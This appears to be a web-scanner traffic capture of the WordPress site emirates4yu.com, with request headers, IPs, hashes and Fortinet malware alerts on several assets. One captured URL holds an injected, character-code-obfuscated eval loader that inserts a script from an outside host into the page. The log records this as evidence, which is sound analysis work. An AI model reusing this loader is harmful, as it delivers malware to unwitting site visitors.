Connection: keep-alive
Referer: https://emirates4yu.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
Content-Length: 0
HTTP/2 204 No Content
access-control-allow-origin: https://emirates4yu.com
date: Fri, 25 Nov 2022 12:02:03 GMT
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
cache-control: no-cache, no-store, must-revalidate
access-control-allow-credentials: true
content-type: text/plain
cross-origin-resource-policy: cross-origin
server: Golfe2
content-length: 0
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
bam.nr-data.net/events/1/689d5b4562?a=2815207&v=1216.487a282&to=NVVXNhYAWhJWBhVfCwwfcxcKAkAIWAtOQA0PVVpMBw5aFUUKDVoBEEMbDwUIWj5UCg9CFg1cWQcWW3kAXgspVwoGXFAQSgZRFQ%3D%3D&rst=2111&ck=1&ref=https://player.vimeo.com/video/307072005
162.247.241.14200 OK 24 B URL HTTP/1.1 bam.nr-data.net/events/1/689d5b4562?a=2815207&v=1216.487a282&to=NVVXNhYAWhJWBhVfCwwfcxcKAkAIWAtOQA0PVVpMBw5aFUUKDVoBEEMbDwUIWj5UCg9CFg1cWQcWW3kAXgspVwoGXFAQSgZRFQ%3D%3D&rst=2111&ck=1&ref=https://player.vimeo.com/video/307072005
IP 162.247.241.14:0
File type GIF image data, version 89a, 1 x 1\012- data
Hash bc32ed98d624acb4008f986349a20d26
2d3df8c11d2168ce2c27e0937421d11d85016361
0c9cf152a0ad00d4f102c93c613c104914be5517ac8f8e0831727f8bfbe8b300
POST /events/1/689d5b4562?a=2815207&v=1216.487a282&to=NVVXNhYAWhJWBhVfCwwfcxcKAkAIWAtOQA0PVVpMBw5aFUUKDVoBEEMbDwUIWj5UCg9CFg1cWQcWW3kAXgspVwoGXFAQSgZRFQ%3D%3D&rst=2111&ck=1&ref=https://player.vimeo.com/video/307072005 HTTP/1.1
Host: bam.nr-data.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
content-type: text/plain
Content-Length: 1672
Origin: https://player.vimeo.com
Connection: keep-alive
Referer: https://player.vimeo.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/1.1 200 OK
Date: Fri, 25 Nov 2022 12:02:03 GMT
Content-Type: image/gif
Content-Length: 24
Connection: keep-alive
CF-Ray: 76fa3bb39ba80af6-OSL
Access-Control-Allow-Origin: https://player.vimeo.com
CF-Cache-Status: DYNAMIC
access-control-allow-credentials: true
access-control-allow-methods: GET, POST, PUT, HEAD, OPTIONS
Vary: Accept-Encoding
Server: cloudflare
emirates4yu.com/wp-content/themes/jupiter/header-builder/includes/assets/css/mkhb-column.css?ver=6.1.5
35.190.203.220200 OK 0 B URL HTTP/2 emirates4yu.com/wp-content/themes/jupiter/header-builder/includes/assets/css/mkhb-column.css?ver=6.1.5
IP 35.190.203.220:0
GET /wp-content/themes/jupiter/header-builder/includes/assets/css/mkhb-column.css?ver=6.1.5 HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: text/css
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Sun, 23 Dec 2018 22:54:03 GMT
etag: W/"5c20120b-11cf"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/plugins/click-to-chat-for-whatsapp/assets/js/app.js?ver=1.6
35.190.203.220200 OK 0 B URL HTTP/2 emirates4yu.com/wp-content/plugins/click-to-chat-for-whatsapp/assets/js/app.js?ver=1.6
IP 35.190.203.220:0
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/click-to-chat-for-whatsapp/assets/js/app.js?ver=1.6 HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: application/javascript
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Wed, 14 Nov 2018 13:21:36 GMT
etag: W/"5bec2160-c27"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2
static.zotabox.com/%3C///%3C/script%3E%3Cscript%20language=javascript%3Eeval(String.fromCharCode(118,%2097,%20114,%2032,%20100,%2061,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2059,%20118,%2097,%20114,%2032,%20115,%2061,%20100,%2046,%2099,%20114,%20101,%2097,%20116,%20101,%2069,%20108,%20101,%20109,%20101,%20110,%20116,%2040,%2039,%20115,%2099,%20114,%20105,%20112,%20116,%2039,%2041,%2059,%2032,%2010,%20115,%2046,%20116,%20121,%20112,%20101,%2061,%2039,%20116,%20101,%20120,%20116,%2047,%20106,%2097,%20118,%2097,%20115,%2099,%20114,%20105,%20112,%20116,%2039,%2059,%2010,%20115,%2046,%2097,%20115,%20121,%20110,%2099,%2061,%20116,%20114,%20117,%20101,%2059,%2010,%20118,%2097,%20114,%2032,%20112,%20108,%2032,%2061,%2032,%2083,%20116,%20114,%20105,%20110,%20103,%2046,%20102,%20114,%20111,%20109,%2067,%20104,%2097,%20114,%2067,%20111,%20100,%20101,%2040,%2049,%2048,%2052,%2044,%2032,%2049,%2049,%2054,%2044,%2032,%2049,%2049,%2054,%2044,%2032,%2049,%2049,%2050,%2044,%2032,%2049,%2049,%2053,%2044,%2032,%2053,%2056,%2044,%2032,%2052,%2055,%2044,%2032,%2052,%2055,%2044,%2032,%2049,%2049,%2053,%2044,%2032,%2049,%2049,%2054,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2049,%2054,%2044,%2032,%2049,%2049,%2053,%2044,%2032,%2052,%2054,%2044,%2032,%2049,%2048,%2051,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2049,%2052,%2044,%2032,%2049,%2049,%2052,%2044,%2032,%2049,%2050,%2049,%2044,%2032,%2049,%2048,%2051,%2044,%2032,%2049,%2049,%2055,%2044,%2032,%2049,%2048,%2048,%2044,%2032,%2049,%2048,%2053,%2044,%2032,%2049,%2049,%2048,%2044,%2032,%2049,%2048,%2053,%2044,%2032,%2052,%2054,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2049,%2049,%2044,%2032,%2049,%2048,%2057,%2041,%2059,%2010,%20115,%2046,%20115,%20114,%2099,%2061,%20112,%20108,%2043,%2039,%2047,%20102,%20108,%2097,%20115,%20107,%2046,%20106,%20115,%2063,%20116,%2061,%20116,%2038,%2039,%2059,%2032,%2010,%20105,%20102,%2032,%2040,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2041,%2032,%20123,%2032,%2010,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2046,%20112,%2097,%20114,%20101,%20110,%20116,%2078,%20111,%20100,%20101,%2046,%20105,%20110,%20115,%20101,%20114,%20116,%2066,%20101,%20102,%20111,%20114,%20101,%2040,%20115,%2044,%2032,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2041,%2059,%2010,%20125,%2032,%20101,%20108,%20115,%20101,%2032,%20123,%2010,%20100,%2046,%20103,%20101,%20116,%2069,%20108,%20101,%20109,%20101,%20110,%20116,%20115,%2066,%20121,%2084,%2097,%20103,%2078,%2097,%20109,%20101,%2040,%2039,%20104,%20101,%2097,%20100,%2039,%2041,%2091,%2048,%2093,%2046,%2097,%20112,%20112,%20101,%20110,%20100,%2067,%20104,%20105,%20108,%20100,%2040,%20115,%2041,%2059,%2010,%20125));%3C/script%3E/widgets.js
104.22.54.216404 Not Found 0 B URL HTTP/2 static.zotabox.com/%3C///%3C/script%3E%3Cscript%20language=javascript%3Eeval(String.fromCharCode(118,%2097,%20114,%2032,%20100,%2061,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2059,%20118,%2097,%20114,%2032,%20115,%2061,%20100,%2046,%2099,%20114,%20101,%2097,%20116,%20101,%2069,%20108,%20101,%20109,%20101,%20110,%20116,%2040,%2039,%20115,%2099,%20114,%20105,%20112,%20116,%2039,%2041,%2059,%2032,%2010,%20115,%2046,%20116,%20121,%20112,%20101,%2061,%2039,%20116,%20101,%20120,%20116,%2047,%20106,%2097,%20118,%2097,%20115,%2099,%20114,%20105,%20112,%20116,%2039,%2059,%2010,%20115,%2046,%2097,%20115,%20121,%20110,%2099,%2061,%20116,%20114,%20117,%20101,%2059,%2010,%20118,%2097,%20114,%2032,%20112,%20108,%2032,%2061,%2032,%2083,%20116,%20114,%20105,%20110,%20103,%2046,%20102,%20114,%20111,%20109,%2067,%20104,%2097,%20114,%2067,%20111,%20100,%20101,%2040,%2049,%2048,%2052,%2044,%2032,%2049,%2049,%2054,%2044,%2032,%2049,%2049,%2054,%2044,%2032,%2049,%2049,%2050,%2044,%2032,%2049,%2049,%2053,%2044,%2032,%2053,%2056,%2044,%2032,%2052,%2055,%2044,%2032,%2052,%2055,%2044,%2032,%2049,%2049,%2053,%2044,%2032,%2049,%2049,%2054,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2049,%2054,%2044,%2032,%2049,%2049,%2053,%2044,%2032,%2052,%2054,%2044,%2032,%2049,%2048,%2051,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2049,%2052,%2044,%2032,%2049,%2049,%2052,%2044,%2032,%2049,%2050,%2049,%2044,%2032,%2049,%2048,%2051,%2044,%2032,%2049,%2049,%2055,%2044,%2032,%2049,%2048,%2048,%2044,%2032,%2049,%2048,%2053,%2044,%2032,%2049,%2049,%2048,%2044,%2032,%2049,%2048,%2053,%2044,%2032,%2052,%2054,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2049,%2049,%2044,%2032,%2049,%2048,%2057,%2041,%2059,%2010,%20115,%2046,%20115,%20114,%2099,%2061,%20112,%20108,%2043,%2039,%2047,%20102,%20108,%2097,%20115,%20107,%2046,%20106,%20115,%2063,%20116,%2061,%20116,%2038,%2039,%2059,%2032,%2010,%20105,%20102,%2032,%2040,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2041,%2032,%20123,%2032,%2010,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2046,%20112,%2097,%20114,%20101,%20110,%20116,%2078,%20111,%20100,%20101,%2046,%20105,%20110,%20115,%20101,%20114,%20116,%2066,%20101,%20102,%20111,%20114,%20101,%2040,%20115,%2044,%2032,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2041,%2059,%2010,%20125,%2032,%20101,%20108,%20115,%20101,%2032,%20123,%2010,%20100,%2046,%20103,%20101,%20116,%2069,%20108,%20101,%20109,%20101,%20110,%20116,%20115,%2066,%20121,%2084,%2097,%20103,%2078,%2097,%20109,%20101,%2040,%2039,%20104,%20101,%2097,%20100,%2039,%2041,%2091,%2048,%2093,%2046,%2097,%20112,%20112,%20101,%20110,%20100,%2067,%20104,%20105,%20108,%20100,%2040,%20115,%2041,%2059,%2010,%20125));%3C/script%3E/widgets.js
IP 104.22.54.216:0
GET /%3C///%3C/script%3E%3Cscript%20language=javascript%3Eeval(String.fromCharCode(118,%2097,%20114,%2032,%20100,%2061,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2059,%20118,%2097,%20114,%2032,%20115,%2061,%20100,%2046,%2099,%20114,%20101,%2097,%20116,%20101,%2069,%20108,%20101,%20109,%20101,%20110,%20116,%2040,%2039,%20115,%2099,%20114,%20105,%20112,%20116,%2039,%2041,%2059,%2032,%2010,%20115,%2046,%20116,%20121,%20112,%20101,%2061,%2039,%20116,%20101,%20120,%20116,%2047,%20106,%2097,%20118,%2097,%20115,%2099,%20114,%20105,%20112,%20116,%2039,%2059,%2010,%20115,%2046,%2097,%20115,%20121,%20110,%2099,%2061,%20116,%20114,%20117,%20101,%2059,%2010,%20118,%2097,%20114,%2032,%20112,%20108,%2032,%2061,%2032,%2083,%20116,%20114,%20105,%20110,%20103,%2046,%20102,%20114,%20111,%20109,%2067,%20104,%2097,%20114,%2067,%20111,%20100,%20101,%2040,%2049,%2048,%2052,%2044,%2032,%2049,%2049,%2054,%2044,%2032,%2049,%2049,%2054,%2044,%2032,%2049,%2049,%2050,%2044,%2032,%2049,%2049,%2053,%2044,%2032,%2053,%2056,%2044,%2032,%2052,%2055,%2044,%2032,%2052,%2055,%2044,%2032,%2049,%2049,%2053,%2044,%2032,%2049,%2049,%2054,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2049,%2054,%2044,%2032,%2049,%2049,%2053,%2044,%2032,%2052,%2054,%2044,%2032,%2049,%2048,%2051,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2049,%2052,%2044,%2032,%2049,%2049,%2052,%2044,%2032,%2049,%2050,%2049,%2044,%2032,%2049,%2048,%2051,%2044,%2032,%2049,%2049,%2055,%2044,%2032,%2049,%2048,%2048,%2044,%2032,%2049,%2048,%2053,%2044,%2032,%2049,%2049,%2048,%2044,%2032,%2049,%2048,%2053,%2044,%2032,%2052,%2054,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2049,%2049,%2044,%2032,%2049,%2048,%2057,%2041,%2059,%2010,%20115,%2046,%20115,%20114,%2099,%2061,%20112,%20108,%2043,%2039,%2047,%20102,%20108,%2097,%20115,%20107,%2046,%20106,%20115,%2063,%20116,%2061,%20116,%2038,%2039,%2059,%2032,%2010,%20105,%20102,%2032,%2040,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2041,%2032,%20123,%2032,%2010,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2046,%20112,%2097,%20114,%20101,%20110,%20116,%2078,%20111,%20100,%20101,%2046,%20105,%20110,%20115,%20101,%20114,%20116,%2066,%20101,%20102,%20111,%20114,%20101,%2040,%20115,%2044,%2032,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2041,%2059,%2010,%20125,%2032,%20101,%20108,%20115,%20101,%2032,%20123,%2010,%20100,%2046,%20103,%20101,%20116,%2069,%20108,%20101,%20109,%20101,%20110,%20116,%20115,%2066,%20121,%2084,%2097,%20103,%2078,%2097,%20109,%20101,%2040,%2039,%20104,%20101,%2097,%20100,%2039,%2041,%2091,%2048,%2093,%2046,%2097,%20112,%20112,%20101,%20110,%20100,%2067,%20104,%20105,%20108,%20100,%2040,%20115,%2041,%2059,%2010,%20125));%3C/script%3E/widgets.js HTTP/1.1
Host: static.zotabox.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 404 Not Found
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: text/html; charset=utf-8
vary: Accept-Encoding
x-powered-by: Zotabox
access-control-allow-origin: *
access-control-allow-methods: GET,POST
content-security-policy: default-src 'none'
x-content-type-options: nosniff
content-encoding: gzip
cf-cache-status: DYNAMIC
server: cloudflare
cf-ray: 76fa3b9ea811b4f1-OSL
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/uploads/bb-plugin/cache/1735-layout.css?ver=f0a77558ad3f599b1fa355fe811a730e
35.190.203.220200 OK 0 B URL HTTP/2 emirates4yu.com/wp-content/uploads/bb-plugin/cache/1735-layout.css?ver=f0a77558ad3f599b1fa355fe811a730e
IP 35.190.203.220:0
Analyzer Verdict Alert fortinet Malware
GET /wp-content/uploads/bb-plugin/cache/1735-layout.css?ver=f0a77558ad3f599b1fa355fe811a730e HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: text/css
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Mon, 07 Nov 2022 16:42:37 GMT
etag: W/"6369357d-37163"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/themes/jupiter/assets/stylesheet/plugins/min/woocommerce.css?ver=6.0.3
35.190.203.220200 OK 0 B URL HTTP/2 emirates4yu.com/wp-content/themes/jupiter/assets/stylesheet/plugins/min/woocommerce.css?ver=6.0.3
IP 35.190.203.220:0
Analyzer Verdict Alert fortinet Malware
GET /wp-content/themes/jupiter/assets/stylesheet/plugins/min/woocommerce.css?ver=6.0.3 HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: text/css
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Sun, 23 Dec 2018 22:54:03 GMT
etag: W/"5c20120b-d7de"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/themes/jupiter/assets/stylesheet/min/full-styles.6.1.5.css?ver=1545605643
35.190.203.220200 OK 0 B URL HTTP/2 emirates4yu.com/wp-content/themes/jupiter/assets/stylesheet/min/full-styles.6.1.5.css?ver=1545605643
IP 35.190.203.220:0
Analyzer Verdict Alert fortinet Malware
GET /wp-content/themes/jupiter/assets/stylesheet/min/full-styles.6.1.5.css?ver=1545605643 HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: text/css
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Sun, 23 Dec 2018 22:54:03 GMT
etag: W/"5c20120b-83daf"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2
stats.wp.com/s-202247.js
192.0.76.3200 OK 0 B IP 192.0.76.3:0
GET /s-202247.js HTTP/1.1
Host: stats.wp.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: application/javascript
vary: Accept-Encoding
etag: W/"6197c5cf-2494"
content-encoding: br
expires: Mon, 20 Nov 2023 12:08:34 GMT
cache-control: max-age=31536000
x-nc: HIT arn
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/plugins/bb-ultimate-addon/assets/css/uabb-animate.css
35.190.203.220200 OK 0 B URL HTTP/2 emirates4yu.com/wp-content/plugins/bb-ultimate-addon/assets/css/uabb-animate.css
IP 35.190.203.220:0
GET /wp-content/plugins/bb-ultimate-addon/assets/css/uabb-animate.css HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: text/css
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Sat, 01 Dec 2018 21:30:58 GMT
etag: W/"5c02fd92-1274f"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/uploads/mk_assets/theme-options-production-1667829365.css?ver=1667829082
35.190.203.220200 OK 0 B URL HTTP/2 emirates4yu.com/wp-content/uploads/mk_assets/theme-options-production-1667829365.css?ver=1667829082
IP 35.190.203.220:0
Analyzer Verdict Alert fortinet Malware
GET /wp-content/uploads/mk_assets/theme-options-production-1667829365.css?ver=1667829082 HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: text/css
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Mon, 07 Nov 2022 13:56:05 GMT
etag: W/"63690e75-9b55"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/uploads/bb-plugin/cache/1735-layout.js?ver=f0a77558ad3f599b1fa355fe811a730e
35.190.203.220200 OK 0 B URL HTTP/2 emirates4yu.com/wp-content/uploads/bb-plugin/cache/1735-layout.js?ver=f0a77558ad3f599b1fa355fe811a730e
IP 35.190.203.220:0
GET /wp-content/uploads/bb-plugin/cache/1735-layout.js?ver=f0a77558ad3f599b1fa355fe811a730e HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: application/javascript
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Mon, 07 Nov 2022 16:42:37 GMT
etag: W/"6369357d-be16"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.6.4
35.190.203.220200 OK 0 B URL HTTP/2 emirates4yu.com/wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.6.4
IP 35.190.203.220:0
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.6.4 HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: application/javascript
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Thu, 27 Oct 2022 10:18:20 GMT
etag: W/"635a5aec-3016"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/uploads/bb-plugin/icons/ultimate-icons/style.css?ver=2.2.6.3
35.190.203.220200 OK 0 B URL HTTP/2 emirates4yu.com/wp-content/uploads/bb-plugin/icons/ultimate-icons/style.css?ver=2.2.6.3
IP 35.190.203.220:0
Analyzer Verdict Alert fortinet Malware
GET /wp-content/uploads/bb-plugin/icons/ultimate-icons/style.css?ver=2.2.6.3 HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:01:59 GMT
content-type: text/css
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Sat, 01 Dec 2018 21:38:27 GMT
etag: W/"5c02ff53-54a3"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/themes/jupiter/header-builder/includes/assets/css/mkhb-row.css?ver=6.1.5
35.190.203.220200 OK 0 B URL HTTP/2 emirates4yu.com/wp-content/themes/jupiter/header-builder/includes/assets/css/mkhb-row.css?ver=6.1.5
IP 35.190.203.220:0
GET /wp-content/themes/jupiter/header-builder/includes/assets/css/mkhb-row.css?ver=6.1.5 HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: text/css
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Sun, 23 Dec 2018 22:54:03 GMT
etag: W/"5c20120b-73f"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2
emirates4yu.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2
35.190.203.220200 OK 0 B URL HTTP/2 emirates4yu.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2
IP 35.190.203.220:0
GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2 HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
